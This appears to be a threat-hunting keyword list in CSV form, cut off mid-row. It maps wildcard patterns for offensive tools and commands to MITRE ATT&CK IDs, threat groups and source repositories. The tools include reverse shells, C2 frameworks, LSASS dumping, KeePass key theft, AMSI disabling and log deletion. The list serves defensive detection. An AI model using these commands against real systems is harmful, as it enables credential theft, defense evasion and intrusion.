TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*remote_exploit_demo_template.erb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. 
identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*remote_shell.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*-remote=127.0.0.1:3000*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,0,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z -*remote-exec *jump *,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - 
Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*RemoteHashRetrieval.ps1*,offensive_tool_keyword,DAMP,The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.,T1222 - T1222.002 - T1548 - T1548.002,TA0005 ,N/A,N/A,Persistence,https://github.com/HarmJ0y/DAMP,1,1,N/A,10,4,356,78,2019-07-25T21:18:37Z,2018-04-06T22:13:58Z -*-RemoteIp * -RemotePort * -Rows * -Cols * -CommandLine *.exe*,offensive_tool_keyword,ConPtyShell,ConPtyShell - Fully Interactive Reverse Shell for Windows,T1021 - T1071,TA0002,N/A,N/A,Exploitation tools,https://github.com/antonioCoco/ConPtyShell,1,0,N/A,N/A,9,817,150,2023-01-20T10:52:52Z,2019-09-13T22:11:18Z -*remote-method-guesser/rmg*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,1,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*remote-method-guesser-master*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,1,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*RemoteNTDLL.cpp*,offensive_tool_keyword,ntdlll-unhooking-collection,unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless),T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 
- T1574.002,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/ntdlll-unhooking-collection,1,1,N/A,9,2,152,34,2023-08-02T02:26:33Z,2023-02-07T16:54:15Z -*RemoteNTDLL.exe*,offensive_tool_keyword,ntdlll-unhooking-collection,unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless),T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/ntdlll-unhooking-collection,1,1,N/A,9,2,152,34,2023-08-02T02:26:33Z,2023-02-07T16:54:15Z -*remotereg.cna*,offensive_tool_keyword,cobaltstrike,Collection of CobaltStrike beacon object files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/pwn1sher/CS-BOFs,1,1,N/A,10,10,100,23,2022-02-14T09:47:30Z,2021-01-18T08:54:48Z -*RemoteScanner.exe*,offensive_tool_keyword,pingcastle,active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands,T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071,TA0006 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation 
tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle,1,1,N/A,N/A,,N/A,,, -*remotewinenum.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Remove_Privilege /Process:* /Privilege:*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,0,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*removeexe-persistence*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - 
T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Remove-Item (Get-PSreadlineOption).HistorySavePath*,offensive_tool_keyword,powershell,Delete powershell history,T1056.002 - T1566.001 - T1567.002,TA0004 - TA0040 - TA0010,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*Remove-Item *C:\Program Files*\TeamViewer\TeamViewer*_Logfile.log*,offensive_tool_keyword,malware,observed usage of third-party tools. such as anydesk or teamviewer to access remote hosts. deletion of these logs file is suspicious and could be the actions of intruders hiding their traces,T1070,TA0005,N/A,N/A,Defense Evasion,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Remove-Item *C:\Users\*\AppData\Roaming\AnyDesk\connection_trace.txt*,offensive_tool_keyword,malware,observed usage of third-party tools. such as anydesk or teamviewer to access remote hosts. deletion of these logs file is suspicious and could be the actions of intruders hiding their traces,T1070,TA0005,N/A,N/A,Defense Evasion,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Remove-KeePassConfigTrigger*,offensive_tool_keyword,Keethief,Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.,T1003 - T1213 - T1215 - T1566,TA0005 - TA0007 - TA0008,N/A,N/A,Credential Access,https://github.com/GhostPack/KeeThief,1,1,N/A,N/A,9,863,151,2020-11-18T18:35:21Z,2016-07-10T19:11:23Z -*RemoveKeePassTrigger.ps1*,offensive_tool_keyword,crackmapexec,Keepass exploitations from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*remove-persistence*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Remove-Persistence.ps1*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*remove-persistence-cron*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Remove-PoshRat*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*removeRegTrace*,offensive_tool_keyword,AoratosWin,A tool that removes traces of executed applications on Windows OS.,T1070 - T1564,TA0005 - TA0011,N/A,N/A,Defense Evasion,https://github.com/PinoyWH1Z/AoratosWin,1,1,N/A,N/A,2,117,18,2022-09-04T09:15:35Z,2022-09-04T09:04:35Z -*Remove-Update.ps1*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Remove-VolumeShadowCopy*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*ren C:\Windows\System32\amsi.dll *.dll,greyware_tool_keyword,ren,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://www.pavel.gr/blog/neutralising-amsi-system-wide-as-an-admin,1,0,N/A,10,8,N/A,N/A,N/A,N/A -*renameMachine.py -current-name * -new-name * -dc-ip * *:*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*renameMachine.py -current-name * -new-name*,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1078.001 - T1078.002 - T1059.003 - T1059.001 - T1053.005 - T1021.001 - T1003.001 - T1003.002 - T1003.004 - T1001.001 ,TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*replace_key_iv_shellcode*,offensive_tool_keyword,cobaltstrike,A protective and Low Level Shellcode Loader that defeats modern EDR systems.,T1548.002 - T1548.003 - 
T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/cribdragg3r/Alaris,1,1,N/A,10,10,846,136,2021-11-01T05:00:43Z,2020-02-22T15:42:37Z -*replace_video_fake_plugin*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*RequestAsPython-PowerShell.py*,offensive_tool_keyword,burpsuite,A collection of scripts to extend Burp Suite. the request gets transformed to its equivalent in Python requests. Python urllib2. 
and PowerShell Invoke-WebRequest.,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/laconicwolf/burp-extensions,1,1,N/A,N/A,2,136,34,2019-04-08T00:49:45Z,2018-03-23T16:05:01Z -*reshacker_setup.exe*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*ResourceDevelopment_EstablishAccounts_RGPerson.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*ResourceDevelopment_Server_DNSLog.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*ResourceDevelopment_Server_LDAPServer.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in 
the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*ResourceDevelopment_WebServices_TencentAPIGateway.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Resources/Design/NinjaStyle.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Resources/drone.dll*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*Resources\donut.exe*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,0,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*responder * --lm*,offensive_tool_keyword,responder,LLMNR. 
NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,0,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*responder -i *,offensive_tool_keyword,responder,LLMNR. NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,0,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*responder --interface*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*Responder.py*,offensive_tool_keyword,responder,LLMNR. NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,1,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*Responder/tools/MultiRelay/bin/Runas.exe*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*Responder/tools/MultiRelay/bin/Syssvc.exe*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z 
-*responder-http-off*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*responder-http-on*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*Responder-Session.log*,offensive_tool_keyword,responder,LLMNR. NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,1,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*responder-smb-off*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*responder-smb-on*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*Responder-Windows*,offensive_tool_keyword,responder,LLMNR. 
NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,1,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*RestartKeePass.ps1*,offensive_tool_keyword,crackmapexec,Keepass exploitations from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*restic2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*restore_signature.sh *.dmp*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,0,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*RestrictedAdmin.exe*,offensive_tool_keyword,Ghostpack-CompiledBinaries,Compiled Binaries for Ghostpack,T1140 - T1559.002 - T1547.002 - T1055 - T1036.004,TA0005 - TA0002 - TA0040 - TA0036,N/A,N/A,Exploitation Tools,https://github.com/r3motecontrol/Ghostpack-CompiledBinaries,1,1,N/A,N/A,9,855,177,2022-11-08T02:58:06Z,2018-07-25T23:38:15Z -*return-wizard-rce-exim.txt*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,0,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*rev_kali_192_168_0_110_1234*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*reveng007/C2_Server*,offensive_tool_keyword,C2_Server,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - 